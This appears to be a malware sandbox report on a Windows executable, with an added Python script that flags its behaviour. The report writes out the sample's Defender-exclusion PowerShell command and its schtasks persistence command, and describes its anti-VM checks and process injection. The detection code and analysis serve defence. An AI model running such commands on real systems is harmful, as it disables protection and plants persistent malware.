Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h | 9_2_0040DDF7
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040DCE9 push edx; mov dword ptr [esp], esi | 9_2_0040E394
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040A4BC push esi; mov dword ptr [esp], 00423347h | 9_2_0040A543
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00409953 push edi; mov dword ptr [esp], 00000091h | 9_2_00409980
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00409953 push ebp; mov dword ptr [esp], 00000090h | 9_2_0040998D
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00411D8C push edx; mov dword ptr [esp], edi | 9_2_00412058
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00409E61 push eax; mov dword ptr [esp], ebx | 9_2_00409FDE
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_00406E04 push ecx; mov dword ptr [esp], ebx | 9_2_00406E69
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040262F push edx; mov dword ptr [esp], edi | 9_2_004027C8
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040262F push edx; mov dword ptr [esp], edi | 9_2_00402815
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040262F push edx; mov dword ptr [esp], edi | 9_2_004029B2
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_004146E1 push eax; mov dword ptr [esp], ebx | 9_2_0041470B
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_0040970C push eax; mov dword ptr [esp], 0042B4A0h | 9_2_004097B9
Source: initial sample | Static PE information: section name: .text entropy: 7.52177326572
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | File created: C:\Users\user\AppData\Roaming\SiEKNQVnm.exe

                      Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe | C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.g94e4BgSRN.exe.266b210.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.g94e4BgSRN.exe.265f1b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: g94e4BgSRN.exe PID: 6384, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\g94e4BgSRN.exe TID: 6388 | Thread sleep time: -38878s >= -30000s
Source: C:\Users\user\Desktop\g94e4BgSRN.exe TID: 6428 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6955
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1506
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Code function: 9_2_004132E6 GetSystemInfo, | 9_2_004132E6
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Thread delayed: delay time: 38878
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: g94e4BgSRN.exe, 00000009.00000002.518230081.00000000012C8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Memory written: C:\Users\user\Desktop\g94e4BgSRN.exe base: 400000 value starts with: 4D5A
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\g94e4BgSRN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmpJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exeJump to behavior
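The three events above (Defender exclusion into AppData, schtasks /Create from an XML in Temp, MZ header written into a child running the same image) are what the two Sigma rules in the summary key on. The following is an added example, not part of the Joe Sandbox report or of NetWire, showing those checks as plain triage rules run over process-creation and memory-write records. The command lines, paths and the 0x400000 / 4D5A values are the report's own; the record shape, field names and the benign control record are this example's assumptions.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Only path shapes are matched; task names and file names stay with the analyst.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
EXCLUSION = re.compile(
    r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))', re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/Create\b', re.I)
XML_ARG = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.I)


def flag_defender_exclusion(cmdline: str) -> bool:
    """Add-MpPreference exclusion whose target lies under a user's AppData tree."""
    m = EXCLUSION.search(cmdline)
    if not m:
        return False
    target = m.group(1) or m.group(2)
    return USER_WRITABLE.search(target) is not None


def flag_schtasks_from_temp(cmdline: str) -> bool:
    """schtasks /Create that imports its task definition from the user's Temp folder."""
    if not SCHTASKS_CREATE.search(cmdline):
        return False
    m = XML_ARG.search(cmdline)
    if not m:
        return False
    xml_path = m.group(1) or m.group(2)
    return TEMP_DIR.search(xml_path) is not None


def flag_mz_written_to_same_image(event: Dict) -> bool:
    """A process writes a PE header (MZ) at a page-aligned address into a process
    running the same image: the shape of hollowing a self-spawned child."""
    same_image = event["source"].lower() == event["target"].lower()
    page_aligned = event["base"] % 0x1000 == 0
    return same_image and page_aligned and event["data"][:2] == b"MZ"


def triage(events: Iterable[Dict]) -> List[Tuple[str, str]]:
    """Return (rule name, detail) pairs for every record a rule fires on."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if ev["kind"] == "process_created":
            if flag_defender_exclusion(ev["cmdline"]):
                hits.append(("defender_exclusion_in_user_dir", ev["cmdline"]))
            if flag_schtasks_from_temp(ev["cmdline"]):
                hits.append(("schtasks_create_from_temp", ev["cmdline"]))
        elif ev["kind"] == "memory_written" and flag_mz_written_to_same_image(ev):
            hits.append(("mz_written_into_same_image", ev["target"]))
    return hits


# Constructed records shaped like the report's lines (assumed field names);
# the command lines and the base/value pair are copied from the report.
EVENTS = [
    {"kind": "process_created",
     "source": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe"'},
    {"kind": "process_created",
     "source": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp"'},
    {"kind": "process_created",
     "source": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "image": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "cmdline": r"C:\Users\user\Desktop\g94e4BgSRN.exe"},
    {"kind": "memory_written",
     "source": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "target": r"C:\Users\user\Desktop\g94e4BgSRN.exe",
     "base": 0x400000, "data": b"MZ\x90\x00\x03\x00\x00\x00"},
    # Benign control (constructed): an exclusion under Program Files must not fire.
    {"kind": "process_created",
     "source": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor"'},
]

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule}: {detail}")
```

The rules deliberately match the command line rather than the image path, because the WoW64 redirection noted above means the parent asked for System32 binaries while the created images live in SysWOW64; a rule keyed on the image path alone would miss half of the 32-bit cases.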
Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmp, Binary or memory string: Program Manager
Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmp, Binary or memory string: Progman
Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmp, Binary or memory string: SProgram Managerl
Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmp, Binary or memory string: Program Manager"
Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd,
Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmp, Binary or memory string: @Program Manager
Note: "Progman" / "Program Manager" are the window class and title of the desktop shell window and "Shell_TrayWnd" is the taskbar's class; a process that resolves them (typically through FindWindow) is checking for, or preparing to act on, an interactive desktop session, which doubles as a sandbox check. The strings were taken from the memory of process 9, the injected instance.
Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: C:\Users\user\Desktop\g94e4BgSRN.exe VolumeInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (three queries)
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\g94e4BgSRN.exe, Queries volume information: VolumeInformation on the installed font files under C:\Windows\Fonts\, one query per file, in this order:
    arial.ttf, ariali.ttf, arialbd.ttf, arialbi.ttf, ARIALN.TTF, ariblk.ttf, ARIALNI.TTF, ARIALNB.TTF, ARIALNBI.TTF, bahnschrift.ttf,
    calibri.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf,
    Candara.ttf, Candarai.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf, consola.ttf, consolai.ttf,
    consolab.ttf, consolaz.ttf, constan.ttf, constani.ttf, constanb.ttf, constanz.ttf, corbel.ttf, corbeli.ttf, corbelb.ttf, corbelz.ttf,
    cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf, framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF,
    FRAMDCN.TTF, FRADMCN.TTF, FRAHV.TTF, FRAHVIT.TTF, Gabriola.ttf, gadugi.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiab.ttf,
    georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf, LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf,
    malgunsl.ttf, malgunbd.ttf, himalaya.ttf, msjh.ttc, msjhl.ttc, msjhbd.ttc, ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf,
    micross.ttf, taile.ttf, taileb.ttf, msyh.ttc, msyhl.ttc, msyhbd.ttc, msyi.ttf, mingliub.ttc, monbaiti.ttf, msgothic.ttc,
    mvboli.ttf, mmrtext.ttf, mmrtextb.ttf, Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
    segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, segoeuii.ttf, seguisli.ttf, seguili.ttf, seguisbi.ttf, segoeuiz.ttf, seguibl.ttf,
    seguibli.ttf, seguiemj.ttf, seguihis.ttf, seguisym.ttf, simsun.ttc, simsunb.ttf, Sitka.ttc, SitkaI.ttc, SitkaB.ttc, SitkaZ.ttc,
    sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf, timesi.ttf, timesbd.ttf, timesbi.ttf, trebuc.ttf, trebucit.ttf, trebucbd.ttf,
    trebucbi.ttf, verdana.ttf, verdanai.ttf, verdanab.ttf, verdanaz.ttf, webdings.ttf, wingding.ttf, YuGothR.ttc, YuGothM.ttc, YuGothL.ttc,
    YuGothB.ttc, holomdl2.ttf, CENTURY.TTF, LEELAWAD.TTF, LEELAWDB.TTF, MSUIGHUR.TTF, MSUIGHUB.TTF, WINGDNG2.TTF, WINGDNG3.TTF, TEMPSITC.TTF,
    PRISTINA.TTF, PAPYRUS.TTF, MISTRAL.TTF, LHANDW.TTF, ITCKRIST.TTF, JUICE___.TTF, FRSCRIPT.TTF, FREESCPT.TTF, BRADHITC.TTF, OUTLOOK.TTF,
    BKANT.TTF, ANTQUAI.TTF, ANTQUAB.TTF, ANTQUABI.TTF, GARA.TTF, GARAIT.TTF, GARABD.TTF, MTCORSVA.TTF, GOTHIC.TTF, GOTHICI.TTF,
    GOTHICB.TTF, GOTHICBI.TTF, ALGER.TTF, BASKVILL.TTF, BAUHS93.TTF, BELL.TTF, BELLI.TTF, BELLB.TTF, BRLNSR.TTF, BRLNSDB.TTF,
    BRLNSB.TTF, BERNHC.TTF, BOD_PSTC.TTF, BRITANIC.TTF, BROADW.TTF, BRUSHSCI.TTF, CALIFR.TTF, CALIFI.TTF, CALIFB.TTF, CENTAUR.TTF,
    CHILLER.TTF, COLONNA.TTF, COOPBL.TTF, FTLTLT.TTF, HARLOWSI.TTF, HARNGTON.TTF, HTOWERT.TTF
Note: the font file queries are GDI+ enumerating the installed fonts on behalf of the System.Drawing and System.Windows.Forms assemblies loaded just above; any .NET WinForms program leaves the same trail, so they carry no weight in the verdict on their own.
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
